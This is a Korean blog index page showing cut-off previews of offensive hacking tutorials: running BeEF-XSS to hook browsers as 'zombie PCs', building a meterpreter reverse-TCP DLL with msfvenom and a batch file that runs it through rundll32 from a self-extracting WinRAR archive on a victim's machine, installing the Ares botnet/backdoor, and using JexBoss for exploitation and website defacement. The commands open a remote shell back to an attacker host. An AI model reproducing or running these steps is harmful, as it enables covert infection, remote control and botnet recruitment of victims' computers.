분류 전체보기260 브라우저 링크에 방문한 것으로 좀비pc로 만드는법 [beEf-XSS] 설치방법 - 칼리리눅스에서 apt-get update && apt-get upgrade를 해준 뒤 apt-get install beef-xss 명령어로 다운로드 받아줍니다. 사용 방법은 cd /usr/share/beef-xss 명령어로 이동 후 ./beef 명령어로 실행합니다. 처음 실행하면 default username과 password로 로그인하지 말라고 실행이 안되는데 config.yaml 파일 [영어로 경로와 설명이 나옵니다.] 을 vim이나 leafpad 등으로 여신 뒤 beef beef 로 된 유저네임과 패스워드를 원하는대로 바꿔주시면 됩니다. 그 후 metasploit과의 연동을 해주면 좋은데 config.yaml 파일에서 metasploit enable 부분을 true로 변경, beef-x.. 2023. 12. 27. winrar sfx를 활용한 압축파일 자동 dll인젝션 sfx 기능은 winrar 압축 파일을 더블클릭만 해도 압축이 자동으로 풀리는 기능입니다. 1> msfvenom -p windows/meterpreter/reverse_tcp lhost=[해커아이피] lport=[리스닝 포트번호] -f dll > virus.dll 위 명령어로 dll 바이러스를 생성해 줍니다. 2. 그 뒤 배치파일을 하나 만들기 위해 leafpad를 열어줍니다. @echo off echo [*]Processing Plz wait.. rundll32.exe virus.dll,main -> virus.dll을 rundll32라는 프로그램처럼 보이게 돌리는것 exit 위 구문들을 넣어주고 virus.bat 파일로 저장해줍니다. 그 후 두 파일을 피해자 윈도우로 옮겨줍니다. 3.두 파일을 같이 .. 2023. 12. 27. 감염 pc를 좀비pc(botnet)로 만드는 도구 ares https://github.com/sweetsoftware/Ares GitHub - sweetsoftware/Ares: Python botnet and backdoor Python botnet and backdoor. Contribute to sweetsoftware/Ares development by creating an account on GitHub. github.com git clone으로 다운받아줍니다. [설치법] >pip install -r requirements.txt >cd server >./ares.py initdb (윈도우 에이전트 사용시) ./wine_setup.sh [사용법] 서버 : ./ares.py runserver -h 0.0.0.0 -p 8080 --threaded -h .. 2023. 12. 27. jexboss 취약점 분석 도구와 apache struts2, 디페이스 공격(웹페이지 변경) https://github.com/joaomatosf/jexboss.git GitHub - joaomatosf/jexboss: JexBoss: Jboss (and Java Deserialization Vulnerabilities) verify and EXploitation Tool JexBoss: Jboss (and Java Deserialization Vulnerabilities) verify and EXploitation Tool - GitHub - joaomatosf/jexboss: JexBoss: Jboss (and Java Deserialization Vulnerabilities) verify and EXploitati... github.com [jexboss] 취약점을 찾아내는 도구인 jexb.. 2023. 12. 27. 이전 1 ··· 20 21 22 23 24 25 26 ··· 65 다음
